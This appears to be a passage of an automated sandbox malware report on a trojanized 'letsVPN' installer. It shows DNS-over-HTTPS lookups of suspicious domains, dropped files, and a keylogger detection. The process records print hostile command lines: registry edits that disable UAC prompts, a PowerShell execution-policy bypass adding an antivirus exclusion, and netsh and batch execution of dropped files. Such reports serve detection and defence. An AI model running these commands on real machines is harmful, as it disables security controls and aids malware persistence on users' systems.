                                                                                                                                                                                                  X-Amz-Cf-Id: cGLEGIhL8GLCxNG5IaKoXi8rwh2uRfvZkxsULBLtBc3_WzV30MEWmg==
                                                                                                                                                                                                  2024-12-29 15:30:25 UTC604INData Raw: 32 35 35 0d 0a 7b 22 53 74 61 74 75 73 22 3a 30 2c 22 54 43 22 3a 66 61 6c 73 65 2c 22 52 44 22 3a 74 72 75 65 2c 22 52 41 22 3a 74 72 75 65 2c 22 41 44 22 3a 66 61 6c 73 65 2c 22 43 44 22 3a 66 61 6c 73 65 2c 22 51 75 65 73 74 69 6f 6e 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 6e 69 74 2e 63 72 61 73 68 31 79 74 69 63 73 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 7d 5d 2c 22 41 6e 73 77 65 72 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 6e 69 74 2e 63 72 61 73 68 31 79 74 69 63 73 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 2c 22 54 54 4c 22 3a 35 2c 22 64 61 74 61 22 3a 22 31 39 2e 38 38 2e 31 36 2e 32 35 31 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 6e 69 74 2e 63 72 61 73 68 31 79 74 69 63 73 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 2c 22 54 54 4c 22 3a 35 2c 22 64
                                                                                                                                                                                                  Data Ascii: 255{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"nit.crash1ytics.com.","type":1}],"Answer":[{"name":"nit.crash1ytics.com.","type":1,"TTL":5,"data":"19.88.16.251"},{"name":"nit.crash1ytics.com.","type":1,"TTL":5,"d
                                                                                                                                                                                                  2024-12-29 15:30:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  1192.168.2.54988013.227.9.1594432448C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2024-12-29 15:30:24 UTC180OUTGET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=nal.fqoqehwib.com.&type=1 HTTP/1.1
                                                                                                                                                                                                  Host: d1dmgcawtbm6l9.cloudfront.net
                                                                                                                                                                                                  User-Agent: Go-http-client/1.1
                                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                                  2024-12-29 15:30:25 UTC676INHTTP/1.1 200 OK
                                                                                                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Server: nginx/1.16.0
                                                                                                                                                                                                  Date: Sun, 29 Dec 2024 15:30:25 GMT
                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Expires: Sun, 29 Dec 2024 15:30:25 GMT
                                                                                                                                                                                                  Cache-Control: private, max-age=1
                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                                                                                  Via: 1.1 6875e0a7bd9edbe1e31cf13567cf2626.cloudfront.net (CloudFront)
                                                                                                                                                                                                  X-Amz-Cf-Pop: BAH53-C1
                                                                                                                                                                                                  X-Amz-Cf-Id: J3Ip5NKHUSlM2u83Vk4Ne6dzAlgt4QEXdV2plvdmXEy2YQ1_CRQL9w==
                                                                                                                                                                                                  2024-12-29 15:30:25 UTC660INData Raw: 32 38 64 0d 0a 7b 22 53 74 61 74 75 73 22 3a 30 2c 22 54 43 22 3a 66 61 6c 73 65 2c 22 52 44 22 3a 74 72 75 65 2c 22 52 41 22 3a 74 72 75 65 2c 22 41 44 22 3a 66 61 6c 73 65 2c 22 43 44 22 3a 66 61 6c 73 65 2c 22 51 75 65 73 74 69 6f 6e 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 6e 61 6c 2e 66 71 6f 71 65 68 77 69 62 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 7d 5d 2c 22 41 6e 73 77 65 72 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 6e 61 6c 2e 66 71 6f 71 65 68 77 69 62 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 2c 22 54 54 4c 22 3a 31 2c 22 64 61 74 61 22 3a 22 32 30 30 2e 32 30 30 2e 31 30 31 2e 39 31 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 6e 61 6c 2e 66 71 6f 71 65 68 77 69 62 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 2c 22 54 54 4c 22 3a 31 2c 22 64 61 74 61 22
                                                                                                                                                                                                  Data Ascii: 28d{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"nal.fqoqehwib.com.","type":1}],"Answer":[{"name":"nal.fqoqehwib.com.","type":1,"TTL":1,"data":"200.200.101.91"},{"name":"nal.fqoqehwib.com.","type":1,"TTL":1,"data"
                                                                                                                                                                                                  2024-12-29 15:30:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                  2192.168.2.54988113.227.9.1594432448C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                  2024-12-29 15:30:24 UTC183OUTGET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=chr.alipayassets.com.&type=1 HTTP/1.1
                                                                                                                                                                                                  Host: d1dmgcawtbm6l9.cloudfront.net
                                                                                                                                                                                                  User-Agent: Go-http-client/1.1
                                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                                  2024-12-29 15:30:25 UTC676INHTTP/1.1 200 OK
                                                                                                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Server: nginx/1.16.0
                                                                                                                                                                                                  Date: Sun, 29 Dec 2024 15:30:25 GMT
                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                  Expires: Sun, 29 Dec 2024 15:30:25 GMT
                                                                                                                                                                                                  Cache-Control: private, max-age=3
                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                                                                                  Via: 1.1 9d372a5e3796d0e47e0033a1ec2335c4.cloudfront.net (CloudFront)
                                                                                                                                                                                                  X-Amz-Cf-Pop: BAH53-C1
                                                                                                                                                                                                  X-Amz-Cf-Id: TQVJjwHEEFVAWBz-xWFy0jLz3C6XtbqPa7VabZpDzrPpS-4IxHbEng==
                                                                                                                                                                                                  2024-12-29 15:30:25 UTC465INData Raw: 31 63 61 0d 0a 7b 22 53 74 61 74 75 73 22 3a 30 2c 22 54 43 22 3a 66 61 6c 73 65 2c 22 52 44 22 3a 74 72 75 65 2c 22 52 41 22 3a 74 72 75 65 2c 22 41 44 22 3a 66 61 6c 73 65 2c 22 43 44 22 3a 66 61 6c 73 65 2c 22 51 75 65 73 74 69 6f 6e 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 63 68 72 2e 61 6c 69 70 61 79 61 73 73 65 74 73 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 7d 5d 2c 22 41 6e 73 77 65 72 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 63 68 72 2e 61 6c 69 70 61 79 61 73 73 65 74 73 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 2c 22 54 54 4c 22 3a 33 2c 22 64 61 74 61 22 3a 22 31 32 39 2e 31 38 30 2e 32 31 37 2e 31 33 38 22 7d 2c 7b 22 6e 61 6d 65 22 3a 22 63 68 72 2e 61 6c 69 70 61 79 61 73 73 65 74 73 2e 63 6f 6d 2e 22 2c 22 74 79 70 65 22 3a 31 2c 22 54 54 4c
                                                                                                                                                                                                  Data Ascii: 1ca{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"chr.alipayassets.com.","type":1}],"Answer":[{"name":"chr.alipayassets.com.","type":1,"TTL":3,"data":"129.180.217.138"},{"name":"chr.alipayassets.com.","type":1,"TTL
                                                                                                                                                                                                  2024-12-29 15:30:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                  Start time:10:28:52
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\letsVPN.exe"
                                                                                                                                                                                                  Imagebase:0x140000000
                                                                                                                                                                                                  File size:33'128'448 bytes
                                                                                                                                                                                                  MD5 hash:EF0F5B020EA3238A98642CD7B56D84BB
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                  Start time:10:28:54
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ipconfig /all
                                                                                                                                                                                                  Imagebase:0x7ff7ba200000
                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                  Start time:10:28:54
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                  Start time:10:28:54
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\ipconfig.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:ipconfig /all
                                                                                                                                                                                                  Imagebase:0x7ff7c4af0000
                                                                                                                                                                                                  File size:35'840 bytes
                                                                                                                                                                                                  MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                  Start time:10:28:55
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Windows\System32\netsh.exe" exec C:\ProgramData\QqXF5.xml
                                                                                                                                                                                                  Imagebase:0x7ff6e4b80000
                                                                                                                                                                                                  File size:96'768 bytes
                                                                                                                                                                                                  MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                  Start time:10:29:01
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Roaming\b6Jzu.bat"
                                                                                                                                                                                                  Imagebase:0x7ff7ba200000
                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                  Start time:10:29:01
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                  Start time:10:29:01
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F
                                                                                                                                                                                                  Imagebase:0x7ff6bca40000
                                                                                                                                                                                                  File size:77'312 bytes
                                                                                                                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                  Start time:10:29:01
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F
                                                                                                                                                                                                  Imagebase:0x7ff6bca40000
                                                                                                                                                                                                  File size:77'312 bytes
                                                                                                                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                  Start time:10:29:01
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F
                                                                                                                                                                                                  Imagebase:0x7ff6bca40000
                                                                                                                                                                                                  File size:77'312 bytes
                                                                                                                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                  Start time:10:29:02
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                  Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                  Start time:10:29:04
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\0zVlL\Jd0i4~16\s+C:\ProgramData\0zVlL\Jd0i4~16\a C:\ProgramData\0zVlL\Jd0i4~16\base.dll
                                                                                                                                                                                                  Imagebase:0x7ff7ba200000
                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                  Start time:10:29:04
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                                  Start time:10:29:06
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\mmc.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\mmc.exe -Embedding
                                                                                                                                                                                                  Imagebase:0x7ff6c21a0000
                                                                                                                                                                                                  File size:1'953'280 bytes
                                                                                                                                                                                                  MD5 hash:58C9E5172C3708A6971CA0CBC80FE8B8
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                                  Start time:10:29:08
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe"
                                                                                                                                                                                                  Imagebase:0x370000
                                                                                                                                                                                                  File size:258'328 bytes
                                                                                                                                                                                                  MD5 hash:68411B35F7B40B45AFC4A60A2681549D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                                  Start time:10:29:09
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\mmc.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\mmc.exe -Embedding
                                                                                                                                                                                                  Imagebase:0x7ff6c21a0000
                                                                                                                                                                                                  File size:1'953'280 bytes
                                                                                                                                                                                                  MD5 hash:58C9E5172C3708A6971CA0CBC80FE8B8
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                  Start time:10:29:09
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:"C:\ProgramData\letsvpn-latest.exe"
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  File size:15'511'576 bytes
                                                                                                                                                                                                  MD5 hash:9F5F358AA1A85D222AD967F4538BC753
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000003.2513670746.000000000292A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                  Start time:10:29:10
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ipconfig /all
                                                                                                                                                                                                  Imagebase:0x790000
                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                                  Start time:10:29:10
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                                  Start time:10:29:11
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:ipconfig /all
                                                                                                                                                                                                  Imagebase:0xb40000
                                                                                                                                                                                                  File size:29'184 bytes
                                                                                                                                                                                                  MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                                  Start time:10:29:44
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1"
                                                                                                                                                                                                  Imagebase:0xcd0000
                                                                                                                                                                                                  File size:433'152 bytes
                                                                                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                                  Start time:10:29:44
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:28
                                                                                                                                                                                                  Start time:10:29:56
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
                                                                                                                                                                                                  Imagebase:0x7ff7132a0000
                                                                                                                                                                                                  File size:101'536 bytes
                                                                                                                                                                                                  MD5 hash:1E3CF83B17891AEE98C3E30012F0B034
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:29
                                                                                                                                                                                                  Start time:10:29:56
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                  General

                                                                                                                                                                                                  Target ID:30
                                                                                                                                                                                                  Start time:10:29:57
                                                                                                                                                                                                  Start date:29/12/2024
                                                                                                                                                                                                  Path:C:\Program Files (x86)\letsvpn\driver\tapinstall.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:"C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" install "C:\Program Files (x86)\letsvpn\driver\OemVista.inf" tap0901
                                                                                                                                                                                                  Imagebase:0x7ff7132a0000
                                                                                                                                                                                                  File size:101'536 bytes
